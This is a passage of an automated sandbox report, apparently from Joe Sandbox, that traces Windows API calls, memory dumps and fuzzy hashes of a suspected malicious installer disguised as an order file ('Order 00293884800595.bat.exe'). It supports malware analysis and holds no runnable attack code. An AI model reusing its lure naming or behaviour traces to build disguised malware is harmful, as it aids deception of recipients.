                                                  • Associated: 00000005.00000002.1802214622178.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214876556.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_400000_Order 00293884800595.jbxd
                                                  Similarity
                                                  • API ID: MessageSend
                                                  • String ID:
                                                  • API String ID: 3850602802-0
                                                  • Opcode ID: a4ad1f289275d07b12332ff40cf82794c587183748ad10ec12a076e6d131a720
                                                  • Instruction ID: 80ce8cba2e1b90c3c9584b4bf9ae45de9eb83361fcac52349235150bfd3c5ac5
                                                  • Opcode Fuzzy Hash: a4ad1f289275d07b12332ff40cf82794c587183748ad10ec12a076e6d131a720
                                                  • Instruction Fuzzy Hash: C801F4317242209BE7295B399D08B6A36D8E710754F50823FF995F71F1E678CC028B5C
                                                  APIs
                                                  • RegDeleteValueA.ADVAPI32(00000000,00000000,00000033), ref: 0040246F
                                                  • RegCloseKey.ADVAPI32(00000000), ref: 00402478
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1802214591803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000005.00000002.1802214559836.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214622178.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214876556.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_400000_Order 00293884800595.jbxd
                                                  Similarity
                                                  • API ID: CloseDeleteValue
                                                  • String ID:
                                                  • API String ID: 2831762973-0
                                                  • Opcode ID: 367c10f48611654ec83905158c0e7abb7b05128d9b12c6fa4614681cb29fe441
                                                  • Instruction ID: 01f6084b7650a9b213f52d22935e9030d34abb49b24569214b94c05b06999087
                                                  • Opcode Fuzzy Hash: 367c10f48611654ec83905158c0e7abb7b05128d9b12c6fa4614681cb29fe441
                                                  • Instruction Fuzzy Hash: D3F0B132604121AFDB60EBA49F4DA7F72A99B40314F15003FF101B71C1D9F84D42466E
                                                  APIs
                                                  • ExpandEnvironmentStringsA.KERNELBASE(00000000,?,00000400,00000001), ref: 00401A56
                                                  • lstrcmpA.KERNEL32(?,?,?,00000400,00000001), ref: 00401A69
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1802214591803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000005.00000002.1802214559836.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214622178.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214876556.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_400000_Order 00293884800595.jbxd
                                                  Similarity
                                                  • API ID: EnvironmentExpandStringslstrcmp
                                                  • String ID:
                                                  • API String ID: 1938659011-0
                                                  • Opcode ID: 1f740ebdafb4e989a716510470814d0f4b96e2deadac2d7748d55cb63aed77a8
                                                  • Instruction ID: 106b93b956adcb394031d7b68410eec4a4f19a4829598155c7958b8f8b1c482a
                                                  • Opcode Fuzzy Hash: 1f740ebdafb4e989a716510470814d0f4b96e2deadac2d7748d55cb63aed77a8
                                                  • Instruction Fuzzy Hash: E8F08231B01201EBCB20CF659E48AAF7EE8DF51354B10403BE145F6190D6788643DF5C
                                                  APIs
                                                  • CreateDirectoryA.KERNELBASE(00431400,?), ref: 004058D9
                                                  • GetLastError.KERNEL32 ref: 004058E7
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1802214591803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000005.00000002.1802214559836.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214622178.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214876556.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_400000_Order 00293884800595.jbxd
                                                  Similarity
                                                  • API ID: CreateDirectoryErrorLast
                                                  • String ID:
                                                  • API String ID: 1375471231-0
                                                  • Opcode ID: 3953c50c5734a5342b3d9bd696b660d903f899823d07f085df3ad9df62cd1170
                                                  • Instruction ID: 6d4ac730157cfa02be50de44a6d7979ff339f577f95dd1204a0ac4d64297c34f
                                                  • Opcode Fuzzy Hash: 3953c50c5734a5342b3d9bd696b660d903f899823d07f085df3ad9df62cd1170
                                                  • Instruction Fuzzy Hash: A3F0F971C0024DDADB00DFA4D5487DEBBB4AF04305F00802AD841B6280D7B882588B99
                                                  APIs
                                                  • ShowWindow.USER32(00000000,00000000), ref: 00401F08
                                                  • EnableWindow.USER32(00000000,00000000), ref: 00401F13
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1802214591803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000005.00000002.1802214559836.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214622178.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214876556.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_400000_Order 00293884800595.jbxd
                                                  Similarity
                                                  • API ID: Window$EnableShow
                                                  • String ID:
                                                  • API String ID: 1136574915-0
                                                  • Opcode ID: c55ef19b1d155cac422469f2929527eb9f7a60a7667ba4af7f0f003dd8d3c6d7
                                                  • Instruction ID: ee44cb40e53ee45f72a0237e1ac7dd9bbdf9d48109a1395b289766a98c9c438f
                                                  • Opcode Fuzzy Hash: c55ef19b1d155cac422469f2929527eb9f7a60a7667ba4af7f0f003dd8d3c6d7
                                                  • Instruction Fuzzy Hash: C9E04872A082049FEF64EBA4FE9556F77F4EB50365B20447FE101F11C2DA7849428A5D
                                                  APIs
                                                  • CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,0042BC90,00431800,00431800,00431800,?,00431400,00000000), ref: 0040594F
                                                  • CloseHandle.KERNEL32(?), ref: 0040595C
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1802214591803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000005.00000002.1802214559836.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214622178.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214876556.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_400000_Order 00293884800595.jbxd
                                                  Similarity
                                                  • API ID: CloseCreateHandleProcess
                                                  • String ID:
                                                  • API String ID: 3712363035-0
                                                  • Opcode ID: f2e48875b6aa7a4f82b92d961b6a232b94f4984d6ef5c684ccb1095c4447d295
                                                  • Instruction ID: 59d3833cbd0ccaca5dcead9257bf18f7f56651039fadea8639d530792baa2c48
                                                  • Opcode Fuzzy Hash: f2e48875b6aa7a4f82b92d961b6a232b94f4984d6ef5c684ccb1095c4447d295
                                                  • Instruction Fuzzy Hash: 4DE09AB4A00209BFFB109F65AD09F7B776CE704714F418425B914F2151EB7498148A7C
                                                  APIs
                                                  • GetModuleHandleA.KERNEL32(?,00000000,?,0040351A,0000000C), ref: 004066C7
                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 004066E2
                                                    • Part of subcall function 00406647: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0040665E
                                                    • Part of subcall function 00406647: wsprintfA.USER32 ref: 00406697
                                                    • Part of subcall function 00406647: LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 004066AB
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1802214591803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000005.00000002.1802214559836.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214622178.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214876556.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_400000_Order 00293884800595.jbxd
                                                  Similarity
                                                  • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                  • String ID:
                                                  • API String ID: 2547128583-0
                                                  • Opcode ID: 6364b50fcd8a78884de1a109c3061c8e2e734accc18c0610f9b5885e266cf418
                                                  • Instruction ID: a472cff2ba870c31c69f4352ad77424fb7bed112d4ffd52c95bf20a34481097e
                                                  • Opcode Fuzzy Hash: 6364b50fcd8a78884de1a109c3061c8e2e734accc18c0610f9b5885e266cf418
                                                  • Instruction Fuzzy Hash: BAE08C73A04210ABD610A6709E0883B73ACAF897413030C3EF952F2240DB3ADC32966E
                                                  APIs
                                                  • GetFileAttributesA.KERNELBASE(00000003,00402F71,C:\Users\user\Desktop\Order 00293884800595.bat.exe,80000000,00000003,?,?,00403722,?,?,00000008,0000000A,0000000C), ref: 00405E24
                                                  • CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,00403722,?,?,00000008,0000000A,0000000C), ref: 00405E46
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1802214591803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000005.00000002.1802214559836.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214622178.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214876556.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_400000_Order 00293884800595.jbxd
                                                  Similarity
                                                  • API ID: File$AttributesCreate
                                                  • String ID:
                                                  • API String ID: 415043291-0
                                                  • Opcode ID: 4c035aff046b4d43788645f88f630755698ea216f1f6cd5eefec511dda558379
                                                  • Instruction ID: 0febe3887fb1e567d40345103610fd6f3e8d71b3c6328ccb34cdb50f288ecb70
                                                  • Opcode Fuzzy Hash: 4c035aff046b4d43788645f88f630755698ea216f1f6cd5eefec511dda558379
                                                  • Instruction Fuzzy Hash: 23D09E31254301AFEF099F20DE16F2E7AA2EB84B00F11952CB682A41E0DA7158299B15
                                                  APIs
                                                  • CreateDirectoryA.KERNELBASE(?,00000000,004033CB,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036B5,?,00000008,0000000A,0000000C), ref: 004058F7
                                                  • GetLastError.KERNEL32(?,00000008,0000000A,0000000C), ref: 00405905
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1802214591803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000005.00000002.1802214559836.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214622178.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214876556.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_400000_Order 00293884800595.jbxd
                                                  Similarity
                                                  • API ID: CreateDirectoryErrorLast
                                                  • String ID:
                                                  • API String ID: 1375471231-0
                                                  • Opcode ID: 7ce514c051633c67dabed91c1ba2c830ad6f4192d7236d4c27a26ed09d9cb01d
                                                  • Instruction ID: 226d66ac6a6a747d722d053d5b09978fff7ae735be90135577c6d3bd4ef0b281
                                                  • Opcode Fuzzy Hash: 7ce514c051633c67dabed91c1ba2c830ad6f4192d7236d4c27a26ed09d9cb01d
                                                  • Instruction Fuzzy Hash: F9C04CB120490ADED6505B319F0971B7A51AB50751F175839A586E40A0DB348455DD2E
                                                  APIs
                                                  • EnumWindows.USER32(00000000), ref: 6CA52B87
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1802235072457.000000006CA51000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CA50000, based on PE: true
                                                  • Associated: 00000005.00000002.1802235017861.000000006CA50000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802235118767.000000006CA54000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802235161633.000000006CA56000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_6ca50000_Order 00293884800595.jbxd
                                                  Similarity
                                                  • API ID: EnumWindows
                                                  • String ID:
                                                  • API String ID: 1129996299-0
                                                  • Opcode ID: 52879ccc499211326cd2c7456f7cba605a576190bcbe9853d15ff7701ad7a4bd
                                                  • Instruction ID: 99bfea88b3f47cb72a3d282005b94e82dc6a07063cbb6f7b8e7db8503c47d150
                                                  • Opcode Fuzzy Hash: 52879ccc499211326cd2c7456f7cba605a576190bcbe9853d15ff7701ad7a4bd
                                                  • Instruction Fuzzy Hash: A841D676A00309DFDF24DF64E988B8A37B4EB45318FE5CA25E506C6B00C73495EA8BD1
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1802214591803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000005.00000002.1802214559836.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214622178.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214876556.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_400000_Order 00293884800595.jbxd
                                                  Similarity
                                                  • API ID: wsprintf
                                                  • String ID:
                                                  • API String ID: 2111968516-0
                                                  • Opcode ID: 27d70afe983ce046a9cdbd576e9bb3ab08da78768c3b3dac89c271fd87d57e25
                                                  • Instruction ID: c5fbe62f9b4e2cb89eed07bb10574c4b4a04671343a68c93ee4f329e73b59f15
                                                  • Opcode Fuzzy Hash: 27d70afe983ce046a9cdbd576e9bb3ab08da78768c3b3dac89c271fd87d57e25
                                                  • Instruction Fuzzy Hash: 3521B530D04289EEDF318B6886586EEBBB09F01314F14407FE4D1B72E2C6BC8985CB69
                                                  APIs
                                                  • MoveFileA.KERNEL32(00000000,00000000), ref: 004016AA
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1802214591803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000005.00000002.1802214559836.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214622178.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214876556.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_400000_Order 00293884800595.jbxd
                                                  Similarity
                                                  • API ID: FileMove
                                                  • String ID:
                                                  • API String ID: 3562171763-0
                                                  • Opcode ID: 01db277db8653d624179d7b600e08ca7f67f5e45fdde97e81b8b39cbf95d4e5b
                                                  • Instruction ID: 67493920040547a329b99de5d89bb6d269ebd8b6645208cc7e8d7a7b283b3978
                                                  • Opcode Fuzzy Hash: 01db277db8653d624179d7b600e08ca7f67f5e45fdde97e81b8b39cbf95d4e5b
                                                  • Instruction Fuzzy Hash: 09F0B431608125A7DF20BB765F5DE5F52A49B41378B20423BF212B21D1DABDC643856E
                                                  APIs
                                                  • SetFilePointer.KERNELBASE(00000000,?,00000000,?,?), ref: 00402776
                                                    • Part of subcall function 004061EB: wsprintfA.USER32 ref: 004061F8
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1802214591803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000005.00000002.1802214559836.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214622178.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214876556.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_400000_Order 00293884800595.jbxd
                                                  Similarity
                                                  • API ID: FilePointerwsprintf
                                                  • String ID:
                                                  • API String ID: 327478801-0
                                                  • Opcode ID: d0d9330acd65b2e867353bc74e86739eab35bf528f3ad37c96d6fee4195676f1
                                                  • Instruction ID: 00adb5ebf99275c5c47ff66d1c826bee854e75ad94e87541b3f98b02de3c6d9f
                                                  • Opcode Fuzzy Hash: d0d9330acd65b2e867353bc74e86739eab35bf528f3ad37c96d6fee4195676f1
                                                  • Instruction Fuzzy Hash: E3E09272A04104AFDF50FBA4AE49DAF76B8EB40359B10043FF202F00C2CA7C4A538A2D
                                                  APIs
                                                  • WritePrivateProfileStringA.KERNEL32(00000000,00000000,?,00000000), ref: 00402402
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1802214591803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000005.00000002.1802214559836.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214622178.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214876556.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_400000_Order 00293884800595.jbxd
                                                  Similarity
                                                  • API ID: PrivateProfileStringWrite
                                                  • String ID:
                                                  • API String ID: 390214022-0
                                                  • Opcode ID: 3326b8378841c5f3540bed9b182ec42c057636b7d1278427695ffb5e145c9da6
                                                  • Instruction ID: f24de8215b53ecbcf80a61348f6bfc7870897c54b3e6c90e9d08f7162164e460
                                                  • Opcode Fuzzy Hash: 3326b8378841c5f3540bed9b182ec42c057636b7d1278427695ffb5e145c9da6
                                                  • Instruction Fuzzy Hash: 9DE04F3160413A6BEB6036B11F8D97F2159AB84314B14053EBA11B62C6D9FC8E8352A9
                                                  APIs
                                                  • RegCreateKeyExA.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402D0F,00000000,?,?), ref: 0040616A
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1802214591803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000005.00000002.1802214559836.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214622178.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214876556.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_400000_Order 00293884800595.jbxd
                                                  Similarity
                                                  • API ID: Create
                                                  • String ID:
                                                  • API String ID: 2289755597-0
                                                  • Opcode ID: b17b4e85cc10dff7c00d1995fa2300a068af545831f113dbcef6cd8b4d780b07
                                                  • Instruction ID: bbdc12591f07ec5b960d4a172b59ed2570ed34ba37628b65f55bcc9503456b15
                                                  • Opcode Fuzzy Hash: b17b4e85cc10dff7c00d1995fa2300a068af545831f113dbcef6cd8b4d780b07
